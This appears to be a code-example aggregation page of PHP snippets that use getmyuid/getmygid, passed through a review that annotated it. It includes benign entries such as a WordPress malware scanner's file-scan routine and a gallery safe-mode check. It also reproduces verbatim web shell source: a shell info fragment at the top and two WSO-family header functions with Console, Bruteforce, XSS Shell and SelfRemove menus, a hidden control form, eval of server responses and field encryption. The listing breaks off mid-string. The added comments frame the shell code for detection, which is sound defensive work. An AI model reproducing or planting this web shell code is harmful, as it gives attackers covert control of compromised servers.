            $sysctl = "{$lin1} {$lin2}";
        } else {
            $sysctl = "-";
        }
    }
    echo ws(3) . $sysctl . "<br>";
    echo ws(3) . ex('echo $OSTYPE') . "<br>";
    echo ws(3) . @substr($SERVER_SOFTWARE, 0, 120) . "<br>";
    $id = ex('id');
    echo !empty($id) ? ws(3) . $id . "<br>" : ws(3) . "user="******" uid=" . @getmyuid() . " gid=" . @getmygid() . "<br>";
    echo ws(3) . $dir;
    echo ws(3) . '( ' . perms(@fileperms($dir)) . ' )';
    echo "</b></font>";
} else {
    echo '<font color=blue><b>OS :' . ws(1) . '<br>Server :' . ws(1) . '<br>User :'******'<br>pwd :' . ws(1) . '</b></font><br>';
    echo "</td><td>";
    echo "<font face=Verdana size=-2 color=red><b>";
    echo ws(3) . @substr(@php_uname(), 0, 120) . "<br>";
    echo ws(3) . @substr($SERVER_SOFTWARE, 0, 120) . "<br>";
    echo ws(3) . @get_current_user() . "<br>";
    echo ws(3) . $dir;
    echo "<br></font>";
}
echo "</font>";
echo "</td></tr></table>";
Ejemplo n.º 19
<?php

// Emit the ids of the script file's owner as one JSON object; both values are
// sent as strings, e.g. {"GroupId":"1000","UserId":"1000"} (constructed sample).
print json_encode(array(
    "GroupId" => (string) getmygid(),
    "UserId" => (string) getmyuid(),
));
Ejemplo n.º 20
/**
 * Scans one file against the loaded definitions and, when the file was
 * selected in $_POST["GOTMLS_fix"], tries to repair or restore it.
 *
 * Flow as visible in this function:
 *  1. read the file; a content hash + size found in the whitelist ends the scan;
 *  2. otherwise run the custom check or each enabled threat level until one matches;
 *  3. if threats were found, either build the result row (checkbox + "Examine"
 *     link) or, for a selected file, quarantine it and write the cleaned or
 *     re-downloaded contents;
 *  4. if nothing was found but the file was selected, treat it as a restore
 *     from quarantine or as already fixed.
 *
 * Results are also published through the globals listed below.
 *
 * @param string $file path of the file to scan
 *
 * @return string a result row from GOTMLS_return_threat(), a JavaScript snippet
 *                calling fixedFile()/failedFile(), or "" when a restore failed
 */
function GOTMLS_scanfile($file)
{
    global $wp_version, $GOTMLS_threat_files, $GOTMLS_threats_found, $GOTMLS_chmod_file, $GOTMLS_chmod_dir, $GOTMLS_file_contents, $GOTMLS_new_contents;
    $GOTMLS_threats_found = array();
    // "<" and ">" are kept in variables and spliced into the markup and patterns below.
    $gt = ">";
    $lt = "<";
    $found = false;
    $threat_link = "";
    $className = "scanned";
    $clean_file = GOTMLS_encode($file);
    $file_name = GOTMLS_explode_dir($file);
    $file_parts = explode(".", "." . array_pop($file_name));
    if (is_file($file) && ($filesize = filesize($file)) && ($GOTMLS_file_contents = @file_get_contents($file))) {
        // Start from the known hashes of this WordPress version, then add the non-threat lists.
        if (isset($GLOBALS["GOTMLS"]["tmp"]["definitions_array"]["wp_core"]["{$wp_version}"]) && is_array($GLOBALS["GOTMLS"]["tmp"]["definitions_array"]["wp_core"]["{$wp_version}"])) {
            $whitelist = array_flip($GLOBALS["GOTMLS"]["tmp"]["definitions_array"]["wp_core"]["{$wp_version}"]);
        } else {
            $whitelist = array();
        }
        foreach ($GLOBALS["GOTMLS"]["tmp"]["definitions_array"]["whitelist"] as $whitelist_file => $non_threats) {
            if (is_array($non_threats) && count($non_threats) > 1) {
                if (isset($non_threats[0])) {
                    unset($non_threats[0]);
                }
                $whitelist = array_merge($whitelist, $non_threats);
            }
        }
        // Whitelist key: md5 of the contents, the letter "O", then the file size.
        // NOTE(review): MD5 is not collision resistant, so this skip is only as
        // strong as MD5 plus the size check.
        if (isset($whitelist[md5($GOTMLS_file_contents) . 'O' . $filesize])) {
            return GOTMLS_return_threat($className, "checked.gif?{$className}", $file, $threat_link);
        }
        $GOTMLS_new_contents = $GOTMLS_file_contents;
        // The custom pattern from the settings is only used when the "eli" query parameter is present.
        if (isset($GLOBALS["GOTMLS"]["log"]["settings"]["check_custom"]) && strlen($GLOBALS["GOTMLS"]["log"]["settings"]["check_custom"]) && isset($_GET['eli']) && substr($GLOBALS["GOTMLS"]["log"]["settings"]["check_custom"], 0, 1) == '/' && ($found = GOTMLS_check_threat($GLOBALS["GOTMLS"]["log"]["settings"]["check_custom"]))) {
            $className = "known";
        } else {
            // Path relative to ABSPATH with forward slashes, as used in the wp_core definitions.
            $path = str_replace("//", "/", "/" . str_replace("\\", "/", substr($file, strlen(ABSPATH))));
            if (isset($_SESSION["GOTMLS_debug"])) {
                $_SESSION["GOTMLS_debug"]["file"] = $file;
                $_SESSION["GOTMLS_debug"]["last"]["total"] = microtime(true);
            }
            foreach ($GLOBALS["GOTMLS"]["tmp"]["threat_levels"] as $threat_level) {
                if (isset($_SESSION["GOTMLS_debug"])) {
                    $_SESSION["GOTMLS_debug"]["threat_level"] = $threat_level;
                    $_SESSION["GOTMLS_debug"]["last"]["threat_level"] = microtime(true);
                }
                // A level is checked only while nothing was found yet, when it is enabled and has
                // definitions; wp_core additionally needs a known path under ABSPATH, and levels
                // listed in $GOTMLS_threat_files only apply to files whose name ends with that value.
                if (in_array($threat_level, $GLOBALS["GOTMLS"]["log"]["settings"]["check"]) && !$found && isset($GLOBALS["GOTMLS"]["tmp"]["definitions_array"][$threat_level]) && ($threat_level != "wp_core" || substr($file, 0, strlen(ABSPATH)) == ABSPATH && isset($GLOBALS["GOTMLS"]["tmp"]["definitions_array"]["wp_core"]["{$wp_version}"]["{$path}"])) && (!array_key_exists($threat_level, $GOTMLS_threat_files) || substr($file . "e", -1 * strlen($GOTMLS_threat_files[$threat_level] . "e")) == $GOTMLS_threat_files[$threat_level] . "e") && ($found = GOTMLS_check_threat($GLOBALS["GOTMLS"]["tmp"]["definitions_array"][$threat_level], $file))) {
                    $className = $threat_level;
                }
            }
            // Debug mode: keep running totals and the fastest/slowest per-file scan time in the session.
            if (isset($_SESSION["GOTMLS_debug"])) {
                $file_time = round(microtime(true) - $_SESSION["GOTMLS_debug"]["last"]["total"], 5);
                if (isset($_SESSION["GOTMLS_debug"]["total"]["total"])) {
                    $_SESSION["GOTMLS_debug"]["total"]["total"] += $file_time;
                } else {
                    $_SESSION["GOTMLS_debug"]["total"]["total"] = $file_time;
                }
                if (isset($_SESSION["GOTMLS_debug"]["total"]["count"])) {
                    $_SESSION["GOTMLS_debug"]["total"]["count"]++;
                } else {
                    $_SESSION["GOTMLS_debug"]["total"]["count"] = 1;
                }
                if (!isset($_SESSION["GOTMLS_debug"]["total"]["least"]) || $file_time < $_SESSION["GOTMLS_debug"]["total"]["least"]) {
                    $_SESSION["GOTMLS_debug"]["total"]["least"] = $file_time;
                }
                if (!isset($_SESSION["GOTMLS_debug"]["total"]["most"]) || $file_time > $_SESSION["GOTMLS_debug"]["total"]["most"]) {
                    $_SESSION["GOTMLS_debug"]["total"]["most"] = $file_time;
                }
            }
        }
    } else {
        // Could not read the file: store a message explaining why. With "eli" set, an
        // unreadable file is chmod()ed to $GOTMLS_chmod_file as a side effect.
        $GOTMLS_file_contents = is_file($file) ? is_readable($file) ? filesize($file) ? __("Failed to read file contents!", 'gotmls') : __("Empty file!", 'gotmls') : (isset($_GET["eli"]) ? @chmod($file, $GOTMLS_chmod_file) ? __("Fixed file permissions! (try again)", 'gotmls') : __("File permissions read-only!", 'gotmls') : __("File not readable!", 'gotmls')) : __("File does not exist!", 'gotmls');
        //		$threat_link = GOTMLS_error_link($GOTMLS_file_contents, $file);
        $className = "errors";
    }
    if (count($GOTMLS_threats_found)) {
        // Link that opens the file in the examine iframe; the file name is passed through GOTMLS_strip4java().
        $threat_link = $lt . 'a target="GOTMLS_iFrame" href="' . GOTMLS_script_URI . '&GOTMLS_scan=' . $clean_file . '" id="list_' . $clean_file . '" onclick="loadIframe(\'' . str_replace("\"", "&quot;", $lt . 'div style="float: left;"' . $gt . 'Examine&nbsp;File&nbsp;...&nbsp;' . $lt . '/div' . $gt . $lt . 'div style="overflow: hidden; position: relative; height: 20px;"' . $gt . $lt . 'div style="position: absolute; right: 0px; text-align: right; width: 9000px;"' . $gt . GOTMLS_strip4java($file)) . $lt . '/div' . $gt . $lt . '/div' . $gt . '\');" class="GOTMLS_plugin"' . $gt;
        if ($className == "errors") {
            $threat_link = GOTMLS_error_link($GOTMLS_file_contents, $file);
            $imageFile = "/blocked";
        } elseif ($className != "potential") {
            // The file was ticked in the submitted fix list: attempt the repair now.
            if (isset($_POST["GOTMLS_fix"]) && is_array($_POST["GOTMLS_fix"]) && in_array($clean_file, $_POST["GOTMLS_fix"])) {
                if ($className == "timthumb") {
                    // NOTE(review): the replacement is fetched over plain http and accepted on a
                    // length check alone; nothing here verifies its integrity before it is written.
                    if (($source = GOTMLS_get_URL("http://{$className}.googlecode.com/svn/trunk/{$className}.php")) && strlen($source) > 500) {
                        $GOTMLS_new_contents = $source;
                    } else {
                        $GOTMLS_file_contents = "";
                    }
                } elseif ($className == 'wp_core') {
                    $path = str_replace("//", "/", "/" . str_replace("\\", "/", substr($file, strlen(ABSPATH))));
                    // The core file is also fetched over http, but it is only used when its
                    // md5 + length matches the definition for this version and path.
                    if (substr($file, 0, strlen(ABSPATH)) == ABSPATH && isset($GLOBALS["GOTMLS"]["tmp"]["definitions_array"]["wp_core"]["{$wp_version}"]["{$path}"]) && $GLOBALS["GOTMLS"]["tmp"]["definitions_array"]["wp_core"]["{$wp_version}"]["{$path}"] != md5($GOTMLS_file_contents) . "O" . strlen($GOTMLS_file_contents) && ($source = GOTMLS_get_URL("http://core.svn.wordpress.org/tags/{$wp_version}{$path}")) && $GLOBALS["GOTMLS"]["tmp"]["definitions_array"]["wp_core"]["{$wp_version}"]["{$path}"] == md5($source) . "O" . strlen($source)) {
                        $GOTMLS_new_contents = $source;
                    } else {
                        $GOTMLS_file_contents = "";
                    }
                } else {
                    // Remove PHP open tags that are directly followed by a close tag or the end of the text.
                    $GOTMLS_new_contents = trim(preg_replace('/' . $lt . '\\?(php)?\\s*(\\?' . $gt . '|$)/i', "", $GOTMLS_new_contents));
                }
                // Quarantine first; then delete the file (only when it is now empty and "eli" is set)
                // or overwrite it with the new contents.
                if (strlen($GOTMLS_file_contents) > 0 && GOTMLS_write_quarantine($file, $className) !== false && (strlen($GOTMLS_new_contents) == 0 && isset($_GET["eli"]) && @unlink($file) || GOTMLS_file_put_contents($file, $GOTMLS_new_contents) !== false)) {
                    echo __("Success!", 'gotmls');
                    return "/*--{$gt}*" . "/\nfixedFile('{$clean_file}');\n/*{$lt}!--*" . "/";
                } else {
                    echo __("Failed:", 'gotmls') . ' ' . (strlen($GOTMLS_file_contents) ? is_writable(dirname(GOTMLS_quarantine($file))) ? is_writable(dirname($file)) && is_writable($file) ? __("reason unknown!", 'gotmls') : __("file not writable!", 'gotmls') : __("quarantine not writable!", 'gotmls') . ' ' : __("no file contents!", 'gotmls'));
                    // NOTE(review): with "eli" set, the script owner's ids and stat() output are
                    // printed into the response; confirm this path is reachable by administrators only.
                    if (isset($_GET["eli"])) {
                        echo 'uid=' . getmyuid() . '(' . get_current_user() . '),gid=' . getmygid() . (is_writable(dirname(GOTMLS_quarantine($file))) ? $lt . 'br' . $gt . $lt . 'pre' . $gt . 'file_stat' . print_r(stat($file), true) : $lt . 'br' . $gt . $lt . 'pre' . $gt . dirname(GOTMLS_quarantine($file)) . ' stat' . print_r(stat(dirname(GOTMLS_quarantine($file))), true));
                    }
                    return "/*--{$gt}*" . "/\nfailedFile('{$clean_file}');\n/*{$lt}!--*" . "/";
                }
            }
            // Not being fixed now: offer a checkbox (pre-checked except for wp_core) in front of the link.
            $threat_link = $lt . 'input type="checkbox" name="GOTMLS_fix[]" value="' . $clean_file . '" id="check_' . $clean_file . ($className != "wp_core" ? '" checked="' . $className : '') . '" /' . $gt . $threat_link;
            $imageFile = "threat";
        } elseif (isset($_POST["GOTMLS_fix"]) && is_array($_POST["GOTMLS_fix"]) && in_array($clean_file, $_POST["GOTMLS_fix"])) {
            echo __("Already Fixed!", 'gotmls');
            return "/*-->*" . "/\nfixedFile('{$clean_file}');\n/*<!--*" . "/";
        } else {
            $imageFile = "question";
        }
        return GOTMLS_return_threat($className, $imageFile, $file, str_replace("GOTMLS_plugin", "GOTMLS_plugin {$className}", $threat_link));
    } elseif (isset($_POST["GOTMLS_fix"]) && is_array($_POST["GOTMLS_fix"]) && in_array($clean_file, $_POST["GOTMLS_fix"])) {
        // No threat found but the file was selected: a file inside the quarantine directory is restored.
        if (GOTMLS_trailingslashit($GLOBALS["GOTMLS"]["tmp"]["quarantine_dir"]) == substr($file, 0, strlen(GOTMLS_trailingslashit($GLOBALS["GOTMLS"]["tmp"]["quarantine_dir"])))) {
            // The rename target is decoded from the second-to-last dot-separated part of the
            // quarantined file name. NOTE(review): confirm that only names written by the
            // quarantine routine can reach this branch, since the decoded value is used as a path.
            if (count($file_parts) > 1 && strtolower($file_parts[count($file_parts) - 1]) == "gotmls" && @rename($file, GOTMLS_decode($file_parts[count($file_parts) - 2]))) {
                echo __("Restored!", 'gotmls');
                return "/*--{$gt}*" . "/\nfixedFile('{$clean_file}');\n/*{$lt}!--*" . "/";
            } else {
                echo __("Restore Failed!", 'gotmls');
                return "";
            }
        } else {
            echo __("Already Fixed!", 'gotmls');
            return "/*--{$gt}*" . "/\nfixedFile('{$clean_file}');\n/*{$lt}!--*" . "/";
        }
    } else {
        return GOTMLS_return_threat($className, ($className == "scanned" ? "checked" : "blocked") . ".gif?{$className}", $file, $threat_link);
    }
}
Ejemplo n.º 21
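 /**
  * Checks that the script and the folder have the same owner id when SAFE_MODE is on.
  * Read http://www.php.net/manual/en/features.safe-mode.php to understand safe_mode
  *
  * With safe_mode_gid the script's group id is compared with the folder's
  * group; otherwise the script's user id is compared with the folder's owner.
  * (The previous version compared the group id with the folder's owner uid.)
  * On a mismatch an error is shown through nggGallery::show_error().
  *
  * @class nggAdmin
  * @param string $foldername
  * @return bool $result false when the ids differ under SAFE_MODE, true otherwise
  */
 function check_safemode($foldername)
 {
     if (SAFE_MODE) {
         $compare_groups = (bool) ini_get('safe_mode_gid');
         $script_uid = $compare_groups ? getmygid() : getmyuid();
         $folder_uid = $compare_groups ? filegroup($foldername) : fileowner($foldername);
         if ($script_uid != $folder_uid) {
             $message = sprintf(__('SAFE MODE Restriction in effect! You need to create the folder <strong>%s</strong> manually', 'nggallery'), $foldername);
             $message .= '<br />' . sprintf(__('When safe_mode is on, PHP checks to see if the owner (%s) of the current script matches the owner (%s) of the file to be operated on by a file function or its directory', 'nggallery'), $script_uid, $folder_uid);
             nggGallery::show_error($message);
             return false;
         }
     }
     return true;
 }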
Ejemplo n.º 22
 /**
  * Tests the permission bits of $this->stat['mode'] for the class the script
  * owner falls into.
  *
  * The user mask applies when getmyuid() equals the stat uid, otherwise the
  * group mask when getmygid() equals the stat gid, otherwise the "other"
  * mask. An owner match never falls through to the group or other bits.
  *
  * @param int $user  bit mask tested for the owner
  * @param int $group bit mask tested for the group
  * @param int $other bit mask tested for everyone else
  *
  * @return bool true when at least one masked bit is set
  */
 protected function checkPermission($user, $group, $other)
 {
     $bits = $this->stat['mode'] & 07777;

     if (getmyuid() === $this->stat['uid']) {
         $mask = $user;
     } elseif (getmygid() === $this->stat['gid']) {
         $mask = $group;
     } else {
         $mask = $other;
     }

     return ($bits & $mask) > 0;
 }
Ejemplo n.º 23
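/**
 * Collect the user and group the PHP process runs as, using the posix extension.
 *
 * The real (not effective) uid/gid of the process are looked up, and the ids
 * PHP reports for the script file (getmyuid/getmygid) are recorded next to them
 * so a caller can compare the two.
 *
 * @return array 'has_extension' is always present. When the posix extension is
 *               loaded the array also holds user_name, user_id, group_name,
 *               group_id, group_members, script_user_id and script_group_id.
 *               user_name / group_name are null when the id has no passwd or
 *               group entry.
 */
function eZSetupPrvPosixExtension()
{
    $userInfo = array('has_extension' => false);
    if (!extension_loaded('posix')) {
        return $userInfo;
    }
    $userInfo['has_extension'] = true;
    $processUid = posix_getuid();
    $processGid = posix_getgid();
    // Both lookups return false when the id has no database entry (for example
    // a container running under an arbitrary numeric uid), so the result must
    // not be indexed blindly.
    $uinfo = posix_getpwuid($processUid);
    $ginfo = posix_getgrgid($processGid);
    $hasUser = is_array($uinfo);
    $hasGroup = is_array($ginfo);
    $userInfo['user_name'] = $hasUser ? $uinfo['name'] : null;
    $userInfo['user_id'] = $hasUser ? $uinfo['uid'] : $processUid;
    $userInfo['group_name'] = $hasGroup ? $ginfo['name'] : null;
    $userInfo['group_id'] = $hasGroup ? $ginfo['gid'] : $processGid;
    $userInfo['group_members'] = $hasGroup ? $ginfo['members'] : array();
    $userInfo['script_user_id'] = getmyuid();
    $userInfo['script_group_id'] = getmygid();
    return $userInfo;
}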
/**
 * Renders the page header of a WSO-family PHP web shell (the title string
 * contains " - WSO " followed by WSO_VERSION). Finding this code in a web root
 * is an indicator of compromise; the notes below are for recognising and
 * triaging it.
 *
 * What the function does, as visible here:
 *  - defaults $_POST['charset'] to $GLOBALS['default_charset'];
 *  - echoes an HTML head with inline CSS and JavaScript and a hidden form named
 *    "mf" (fields a, c, p1, p2, p3, charset) through which the UI posts back;
 *  - echoes a status table with uname, user/group ids, PHP version, disk usage,
 *    current-directory links, server and client addresses, and the module menu.
 *
 * Review notes:
 *  - $_POST['charset'] and $_SERVER['HTTP_HOST'] are written into the markup
 *    unescaped, and c_, a_ and charset_ are placed inside single-quoted
 *    JavaScript strings via htmlspecialchars() without ENT_QUOTES (single
 *    quotes stay unescaped on PHP versions before 8.1).
 *  - The inline processReqChange() handler passes part of the HTTP response
 *    body to eval().
 *  - The action names in $m ('FilesMan', 'SelfRemove', 'Bruteforce', ...) and
 *    the hidden "mf" form are fixed strings in this listing, which makes them
 *    usable as content-scanning signatures.
 *
 * @return void output is written with echo
 */
function wsoHeader()
{
    if (empty($_POST['charset'])) {
        $_POST['charset'] = $GLOBALS['default_charset'];
    }
    global $color;
    // One echo emits the whole head: meta/title, CSS, the client-side helpers
    // set(), g(), a(), sr(), processReqChange(), and the hidden "mf" form.
    echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION . "</title> \n<style> \nbody {background-color:#000;color:#fff;}  \nbody,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top; }  \nspan,h1,a{ color: {$color} !important; }  \nspan{ font-weight: bolder; }  \nh1{ border:1px solid {$color};padding: 2px 5px;font: 14pt Verdana;margin:0px; }  \ndiv.content{ padding: 5px;margin-left:5px;}  \na{ text-decoration:none; }  \na:hover{ background:#ff0000; }  \n.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }  \n.bigarea{ width:100%;height:250px; }  \ninput, textarea, select{ margin:0;color:#00ff00;background-color:#000;border:1px solid {$color}; font: 9pt Monospace,'Courier New'; }  \nform{ margin:0px; }  \n#toolsTbl{ text-align:center; }  \n.toolsInp{ width: 80%; }  \n.main th{text-align:left;}  \n.main tr:hover{background-color:#5e5e5e;}  \n.main td, th{vertical-align:middle;}  \npre{font-family:Courier,Monospace;} \n#cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}  \n</style> \n<script> \n    var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "'; \n    var a_ = '" . htmlspecialchars(@$_POST['a']) . "'\n    var charset_ = '" . htmlspecialchars(@$_POST['charset']) . "'; \n    var p1_ = '" . (strpos(@$_POST['p1'], "\n") !== false ? '' : htmlspecialchars($_POST['p1'], ENT_QUOTES)) . "'; \n    var p2_ = '" . (strpos(@$_POST['p2'], "\n") !== false ? '' : htmlspecialchars($_POST['p2'], ENT_QUOTES)) . "'; \n    var p3_ = '" . (strpos(@$_POST['p3'], "\n") !== false ? '' : htmlspecialchars($_POST['p3'], ENT_QUOTES)) . 
"'; \n    var d = document; \n    function set(a,c,p1,p2,p3,charset) { \n        if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; \n        if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; \n        if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; \n        if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; \n        if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; \n        if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; \n    } \n    function g(a,c,p1,p2,p3,charset) { \n        set(a,c,p1,p2,p3,charset); \n        d.mf.submit(); \n    } \n    function a(a,c,p1,p2,p3,charset) { \n        set(a,c,p1,p2,p3,charset); \n        var params = 'ajax=true'; \n        for(i=0;i<d.mf.elements.length;i++) \n            params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); \n        sr('" . addslashes($_SERVER['REQUEST_URI']) . "', params); \n    } \n    function sr(url, params) { \n        if (window.XMLHttpRequest) \n            req = new XMLHttpRequest(); \n        else if (window.ActiveXObject) \n            req = new ActiveXObject('Microsoft.XMLHTTP'); \n        if (req) { \n            req.onreadystatechange = processReqChange; \n            req.open('POST', url, true); \n            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); \n            req.send(params); \n        } \n    } \n    function processReqChange() { \n        if( (req.readyState == 4) ) \n            if(req.status == 200) { \n                var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm'); \n                var arr=reg.exec(req.responseText); \n                eval(arr[2].substr(0, arr[1])); \n            } else alert('Request error!'); \n    } \n</script> \n<head><body><div style='position:absolute;width:100%;background-color:#000;top:0;left:0;'> \n<form method=post name=mf style='display:none;'> \n<input type=hidden name=a> \n<input type=hidden name=c> \n<input type=hidden name=p1> \n<input 
type=hidden name=p2> \n  \n<input type=hidden name=p3> \n<input type=hidden name=charset> \n</form>";
    $freeSpace = @diskfreespace($GLOBALS['cwd']);
    $totalSpace = @disk_total_space($GLOBALS['cwd']);
    // A falsy total is replaced by 1 so the percentage below never divides by zero.
    $totalSpace = $totalSpace ? $totalSpace : 1;
    // $release and $kernel are assigned here but not read again in this function.
    $release = @php_uname('r');
    $kernel = @php_uname('s');
    // Without the posix functions the ids come from getmyuid()/getmygid() and
    // the group name is shown as "?"; with them the effective uid/gid are
    // resolved to names.
    if (!function_exists('posix_getegid')) {
        $user = @get_current_user();
        $uid = @getmyuid();
        $gid = @getmygid();
        $group = "?";
    } else {
        $uid = @posix_getpwuid(posix_geteuid());
        $gid = @posix_getgrgid(posix_getegid());
        $user = $uid['name'];
        $uid = $uid['uid'];
        $group = $gid['name'];
        $gid = $gid['gid'];
    }
    // One link per component of $GLOBALS['cwd']; each link's onclick carries the
    // path prefix up to that component. The path text is not escaped.
    $cwd_links = '';
    $path = explode("/", $GLOBALS['cwd']);
    $n = count($path);
    for ($i = 0; $i < $n - 1; $i++) {
        $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
        for ($j = 0; $j <= $i; $j++) {
            $cwd_links .= $path[$j] . '/';
        }
        $cwd_links .= "\")'>" . $path[$i] . "/</a>";
    }
    $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
    $opt_charsets = '';
    foreach ($charsets as $item) {
        $opt_charsets .= '<option value="' . $item . '" ' . ($_POST['charset'] == $item ? 'selected' : '') . '>' . $item . '</option>';
    }
    // Menu label => action name posted in field "a".
    $m = array('Sec Info' => 'SecInfo', 'Files' => 'FilesMan', 'Exec' => 'Console', 'Sql' => 'Sql', 'PHP Tools' => 'phptools', 'LFI' => 'lfiscan', 'Php' => 'Php', 'Safe mode' => 'SafeMode', 'String tools' => 'StringTools', 'XSS Shell' => 'XSSShell', 'Bruteforce' => 'Bruteforce', 'Network' => 'Network');
    // "Logout" is only offered when $GLOBALS['auth_pass'] is non-empty.
    if (!empty($GLOBALS['auth_pass'])) {
        $m['Logout'] = 'Logout';
    }
    $m['Self remove'] = 'SelfRemove';
    $menu = '';
    foreach ($m as $k => $v) {
        $menu .= '<th width="' . (int) (100 / count($m)) . '%">[<a href="#" onclick="g(\'' . $v . '\',null,\'\',\'\',\'\')">' . $k . '</a>]</th>';
    }
    $drives = "";
    if ($GLOBALS['os'] == 'win') {
        foreach (range('c', 'z') as $drive) {
            if (is_dir($drive . ':\\')) {
                $drives .= '<a href="#" onclick="g(\'FilesMan\',\'' . $drive . ':/\')">[ ' . $drive . ' ]</a> ';
            }
        }
    }
    // Status table: host details, ids, PHP version, disk usage, directory links,
    // charset selector, server/client address, then the menu row.
    echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win' ? '<br>Drives:' : '') . '</span></td>' . '<td><nobr>' . substr(@php_uname(), 0, 120) . ' </nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode'] ? '<font color=red>ON</font>' : '<font color=#00bb00><b>OFF</b></font>') . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . wsoViewSize($totalSpace) . ' <span>Free:</span> ' . wsoViewSize($freeSpace) . ' (' . (int) ($freeSpace / $totalSpace * 100) . '%)<br>' . $cwd_links . ' ' . wsoPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>' . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>' . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">';
}
Ejemplo n.º 25
/**
 * Renders the page header of a WSO-derived PHP web shell (the title string
 * contains " - WSO " followed by VERSION). Finding this code in a web root is
 * an indicator of compromise; the notes below are for recognising and
 * triaging it.
 *
 * What the function does, as visible here:
 *  - defaults $_POST['charset'] to a global stored under a non-ASCII key;
 *  - echoes an HTML head with inline CSS and JavaScript and a hidden form named
 *    "mf" (fields a, c, p1, p2, p3, charset);
 *  - the inline set() helper passes a, c, p1, p2 and p3 through a client-side
 *    encrypt() routine (base64 plus XOR with a key) before the form is
 *    submitted; the key is read from the cookie named
 *    md5($_SERVER['HTTP_HOST']) . "key";
 *  - echoes a status table with uname, ids, PHP version, disk usage, directory
 *    links, host and client addresses, and the module menu.
 *
 * Review notes:
 *  - $GLOBALS['▜'], $GLOBALS['▛'] and $▟ are non-ASCII identifiers; whether
 *    that is deliberate obfuscation or an encoding artefact of this listing
 *    cannot be told from here.
 *  - Because the form fields are transformed before submission, the plain
 *    action names would not be expected in request bodies; the fixed strings in
 *    the file itself are the more dependable thing to match on.
 *  - $_POST['charset'], $_SERVER['HTTP_HOST'] and the cookie value are written
 *    into the page unescaped.
 *  - processReqChange() passes part of the HTTP response body to eval().
 *
 * @return void output is written with echo
 */
function hardHeader()
{
    if (empty($_POST['charset'])) {
        $_POST['charset'] = $GLOBALS['▜'];
    }
    // One echo emits the whole head: meta/title, CSS, the client-side helpers
    // encrypt(), utf8_encode(), base64_encode(), set(), g(), a(), sr(),
    // processReqChange(), and the hidden "mf" form.
    echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . VERSION . "</title>\n<style>\n\tbody {background-color:#060A10; color:#e1e1e1; margin:0; font:normal 75% Arial, Helvetica, sans-serif; } canvas{ display: block; vertical-align: bottom;}\n\tbody,td,th\t{font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;}\n\ttable.info\t{color:#C3C3C3;background-color: #060A10;}\n\ttable#toolsTbl {background-color: #060A10;}\n\tspan,h1,a\t{color:#fff !important;}\n\tspan\t\t{font-weight:bolder;}\n\th1\t\t\t{border-left:5px solid #2E6E9C;padding:2px 5px;font:14pt Verdana;background-color:#10151c;margin:0px;}\n\tdiv.content\t{padding:5px;margin-left:5px;background-color:#060a10;}\n\ta\t\t\t{text-decoration:none;}\n\ta:hover\t\t{text-decoration:underline;}\n\t.tooltip::after {background:#0663D5;color:#FFF;content: attr(data-tooltip);margin-top:-50px;display:block;padding:6px 10px;position:absolute;visibility:hidden;}\n\t.tooltip:hover::after {opacity:1;visibility:visible;}\n\t.ml1\t\t{border:1px solid #1e252f;padding:5px;margin:0;overflow:auto;}\n\t.bigarea\t{min-width:100%;max-width:100%;height:400px;}\n\tinput, textarea, select\t{margin:0;color:#fff;background-color:#1e252f;border:none;font:9pt Courier New;outline:none;}\n\tlabel {position:relative}\n\tlabel:after {content:'<>';font:10px 'Consolas', monospace;color:#fff;-webkit-transform:rotate(90deg);-moz-transform:rotate(90deg);-ms-transform:rotate(90deg);transform:rotate(90deg);right:3px; top:3px;padding:0;position:absolute;pointer-events:none;}\n\tlabel:before {content:'';right:0; top:0;width:17px; height:17px;background:#1e252f;position:absolute;pointer-events:none;display:block;}\n\tform\t\t{margin:0px;}\n\t#toolsTbl\t{text-align:center;}\n\t#fak \t\t{background:none;}\n\t#fak td \t{padding:5px 0 0 0;}\n\tiframe\t\t{border:1px solid #060a10;}\n\t.toolsInp\t{width:300px}\n\t.main 
